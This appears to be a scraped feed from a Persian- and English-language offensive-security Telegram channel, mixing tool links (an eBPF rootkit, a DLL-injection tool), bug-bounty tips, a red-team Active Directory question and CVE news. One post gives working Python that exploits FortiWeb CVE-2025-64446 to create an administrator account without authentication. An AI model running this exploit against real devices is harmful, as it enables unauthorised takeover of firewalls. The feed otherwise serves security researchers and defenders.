DomLoggerpp by @kevin_mizu is a simple web extension that helps you identify JavaScript DOM sinks that could lead to DOM-based vulnerabilities (such as XSS)! 😎
Check it out! 👇
https://github.com/kevin-mizu/domloggerpp
@Radvansec
Check it out! 👇
https://github.com/kevin-mizu/domloggerpp
@Radvansec
❤4👍1
CVE-2025-64446 FortiWeb Unauthenticated RCE via Path Traversal and CGI Auth Bypass
So, based on THIS, you can get something like this:
⭐️ @RadvanSec
So, based on THIS, you can get something like this:
import base64, json, subprocess
header = base64.b64encode(json.dumps({
"username": "admin",
"profname": "prof_admin",
"vdom": "root",
"loginname": "admin"
}).encode()).decode()
payload = json.dumps({
"data": {
"q_type": 1,
"name": "note2",
"access-profile": "prof_admin",
"password": "note2",
"comment": "automated RCE"
}
})
cmd = [
"curl", "--path-as-is", "-sk",
"-H", f"CGIINFO: {header}",
"-H", "Content-Type: application/json",
"--data", payload,
"https://localhost:38443/api/v2.0/cmdb/system/admin%3f/../../../cgi-bin/fwbcgi"
]
print(subprocess.run(cmd, capture_output=True, text=True).stdout)
PY
Output from the box:
{ "results": { "name": "note2", "access-profile": "prof_admin", ... } }
⭐️ @RadvanSec
Gist
FortiWeb Unauthenticated RCE via Path Traversal and CGI Auth Bypass CVE-2025-64446
FortiWeb Unauthenticated RCE via Path Traversal and CGI Auth Bypass CVE-2025-64446 - CVE-2025-64446.md
❤3👍2
Forwarded from GO-TO CVE
سوال ردتیم :
یک AD کامل پچشده (Server 2025 + Defender for Identity + Tier 0 isolation + LDAP signing/enforcement + SMB signing) داری.
بدون credential اولیه، بدون physical، بدون zero-day عمومی، حداکثر چند روز طول میکشه تا Golden Ticket بگیری؟
chain کامل رو بنویس (از initial foothold تا DCSync، فقط با تکنیکهای ۲۰۲۵ که الان کار میکنن).
یک AD کامل پچشده (Server 2025 + Defender for Identity + Tier 0 isolation + LDAP signing/enforcement + SMB signing) داری.
بدون credential اولیه، بدون physical، بدون zero-day عمومی، حداکثر چند روز طول میکشه تا Golden Ticket بگیری؟
chain کامل رو بنویس (از initial foothold تا DCSync، فقط با تکنیکهای ۲۰۲۵ که الان کار میکنن).
❤🔥3❤2
Forwarded from ReverseEngineering
A Linux eBPF rootkit with a backdoor C2 library injection execution hijacking persistence and stealth capabilities
https://github.com/h3xduck/TripleCross
@reverseengine
https://github.com/h3xduck/TripleCross
@reverseengine
GitHub
GitHub - h3xduck/TripleCross: A Linux eBPF rootkit with a backdoor, C2, library injection, execution hijacking, persistence and…
A Linux eBPF rootkit with a backdoor, C2, library injection, execution hijacking, persistence and stealth capabilities. - h3xduck/TripleCross
❤3
Forwarded from PentesterLand Academy - Public
دوس داری یک ه.کر قدرتمند با توانایی بالا بشی؟
میخوای صفر تا صد از ابزار و هوش مصنوعی استفاده کنی؟
این ویدیو مخصوص اینه که بهت تو این موضوع کمک کنه که بتونی از این روش استفاده کنی که با سریع ترین حالت ممکن یک ه.کر توانمند در هر حوزه ای که دوس داری بشی 😉
دوس داشتی بفرس برای دوستات که میخوان سریع حکر بشن
https://www.instagram.com/reel/DRkNUj8Db2L/?igsh=MXdocTZ4azAyODhpMg==
میخوای صفر تا صد از ابزار و هوش مصنوعی استفاده کنی؟
این ویدیو مخصوص اینه که بهت تو این موضوع کمک کنه که بتونی از این روش استفاده کنی که با سریع ترین حالت ممکن یک ه.کر توانمند در هر حوزه ای که دوس داری بشی 😉
دوس داشتی بفرس برای دوستات که میخوان سریع حکر بشن
https://www.instagram.com/reel/DRkNUj8Db2L/?igsh=MXdocTZ4azAyODhpMg==
Instagram
@pentesterland
دوس داری یک ه.کر قدرتمند با توانایی بالا بشی؟
میخوای صفر تا صد از ابزار و هوش مصنوعی استفاده کنی؟
این ویدیو مخصوص اینه که بهت تو این موضوع کمک کنه که بتونی از این روش استفاده کنی که با سریع ترین حالت ممکن یک ه.کر توانمند در هر حوزه ای که دوس داری بشی…
دوس داری یک ه.کر قدرتمند با توانایی بالا بشی؟
میخوای صفر تا صد از ابزار و هوش مصنوعی استفاده کنی؟
این ویدیو مخصوص اینه که بهت تو این موضوع کمک کنه که بتونی از این روش استفاده کنی که با سریع ترین حالت ممکن یک ه.کر توانمند در هر حوزه ای که دوس داری بشی…
❤5👍2
OWASP_AI_Testing_Guide.pdf
6.2 MB
#MLSecOps
#Whitepaper
#Threat_Modelling
"OWASP AI Testing Guide", Version 1, Nov. 2025.
]-> Repo
// This Guide is designed to serve as a comprehensive reference for software developers, architects, data analysts, researchers, auditors and risk officers, ensuring that AI risks are systematically addressed throughout the product development lifecycle
@Radvansec
#Whitepaper
#Threat_Modelling
"OWASP AI Testing Guide", Version 1, Nov. 2025.
]-> Repo
// This Guide is designed to serve as a comprehensive reference for software developers, architects, data analysts, researchers, auditors and risk officers, ensuring that AI risks are systematically addressed throughout the product development lifecycle
@Radvansec
❤8
Forwarded from PentesterLand Academy - Public
اگه میخوای بیشتر XSS هات P2,P1 بشن از نکته زیر استفاده کن
۹۹ درصد باگ هانترا (صرفا باگ هانترا) راجب این تکنیک چیزی نمیدونن ولی وقتی ترکیبش میکنی تو گزارشت تریاژر خوف میکنه رسما
سعی کن هکر باشی ❤️🔥😉
https://x.com/pentesterlanden/status/1994795913488077214?s=46
۹۹ درصد باگ هانترا (صرفا باگ هانترا) راجب این تکنیک چیزی نمیدونن ولی وقتی ترکیبش میکنی تو گزارشت تریاژر خوف میکنه رسما
سعی کن هکر باشی ❤️🔥😉
https://x.com/pentesterlanden/status/1994795913488077214?s=46
X (formerly Twitter)
PentesterLand (@PentesterLandEn) on X
Consider incorporating SVG Smuggling and HTMLSmuggling vectors into your bug bounty reports(XSS).
They frequently result in higher-impact findings and increased bounty rewards.
Trust me😉
by these techniques, over 70% of them escalated to P2/P1 severity
#bugbountytips…
They frequently result in higher-impact findings and increased bounty rewards.
Trust me😉
by these techniques, over 70% of them escalated to P2/P1 severity
#bugbountytips…
❤7
This media is not supported in your browser
VIEW IN TELEGRAM
Injecting a DLL into an Explorer process using icons
https://github.com/d419h/IconJector
⭐️ @RadvanSec
https://github.com/d419h/IconJector
⭐️ @RadvanSec
❤3👍1
Forwarded from لیان - آموزش امنیت و تستنفوذ
امروز روز جهانی امنیت سایبری است؛ روزی برای یادآوری یک واقعیت مهم:
هر کلیک میتواند مخاطرهآمیز باشد، هر ایمیل بالقوه یک تهدید است و هر بیاحتیاطی ممکن است پیامدهای جدی و جبرانناپذیری بهدنبال داشته باشد.
امنیت صرفاً به ابزارها وابسته نیست؛ بخش بزرگی از آن به رفتار و دقت ما بازمیگردد.
به همین دلیل، امروز فرصتی مناسب است تا چند اقدام ساده اما حیاتی را مرور کنیم: استفاده از گذرواژههای امن و پیچیده، پرهیز از باز کردن پیامها و پیوستهای مشکوک، و توجه به ارزش واقعی دادههایی که در اختیار داریم.
در جهانی که هر روز بیش از گذشته دیجیتالی میشود، توجه به امنیت اطلاعات باید به یک عادت جدی و همیشگی تبدیل شود.
💻 گروه لیان
☺️ https://liangroup.net/
☺️ @AcademyLian
هر کلیک میتواند مخاطرهآمیز باشد، هر ایمیل بالقوه یک تهدید است و هر بیاحتیاطی ممکن است پیامدهای جدی و جبرانناپذیری بهدنبال داشته باشد.
امنیت صرفاً به ابزارها وابسته نیست؛ بخش بزرگی از آن به رفتار و دقت ما بازمیگردد.
به همین دلیل، امروز فرصتی مناسب است تا چند اقدام ساده اما حیاتی را مرور کنیم: استفاده از گذرواژههای امن و پیچیده، پرهیز از باز کردن پیامها و پیوستهای مشکوک، و توجه به ارزش واقعی دادههایی که در اختیار داریم.
در جهانی که هر روز بیش از گذشته دیجیتالی میشود، توجه به امنیت اطلاعات باید به یک عادت جدی و همیشگی تبدیل شود.
💻 گروه لیان
Please open Telegram to view this post
VIEW IN TELEGRAM
❤6
CVE-2025-47776 - 1day, MantisBT vulnerable to authentication bypass for some passwords due to PHP type juggling
#Pruva today reproduction and exploit.
Exploit
⭐️ @RadvanSec
#Pruva today reproduction and exploit.
Exploit
⭐️ @RadvanSec
❤4👍2🔥1👏1
Sin0x001
Web Application Security-Persian.pdf
کتاب web application رو گفتید بزارم ترجمش رو یکی از بچه ها زحمت کشیده کانالشون :
@web_articles
@web_articles
👍4❤2
40 Methods for Privilege Escalation Linux-Windows-macOS.pdf
84.9 MB
40 Methods Of Privilege Escalation of Linux, Windows and Mac
۴۰ روش افزایش سطح دسترسی در لینوکس، ویندوز و مک
⭐️ @RadvanSec
۴۰ روش افزایش سطح دسترسی در لینوکس، ویندوز و مک
⭐️ @RadvanSec
❤6👍2
بچه هایی که باگ بانتی کار میکنید رفلکشن روی js فایل ها براتون اهمیت داره یا خیلی ساده ازش رد میشید؟!
بگین یه tip کلاینت ساید بهتون بگم
بگین یه tip کلاینت ساید بهتون بگم
Anonymous Poll
36%
اهمیتی نداره برام چون کانتنت صفحه html نیست
64%
اهمیت داره و سعی میکنم اکسپلویت کنم
❤3🔥1
RadvanSec
بچه هایی که باگ بانتی کار میکنید رفلکشن روی js فایل ها براتون اهمیت داره یا خیلی ساده ازش رد میشید؟!
بگین یه tip کلاینت ساید بهتون بگم
بگین یه tip کلاینت ساید بهتون بگم
اکسپلویت رو داخل دایرکت کانال بگین
🔥3
https://slcyber.io/research-center/high-fidelity-detection-mechanism-for-rsc-next-js-rce-cve-2025-55182-cve-2025-66478/
@radvansec
@radvansec
Searchlight Cyber
High Fidelity Detection Mechanism for RSC/Next.js RCE (CVE-2025-55182 & CVE-2025-66478) › Searchlight Cyber
This morning, an advisory was released for Next.js about a vulnerability that leads to RCE in default configurations, with no prerequisites. The root cause of this issue lies in React Server Components, which Next.js utilizes. Over the last day, we have noticed…
❤6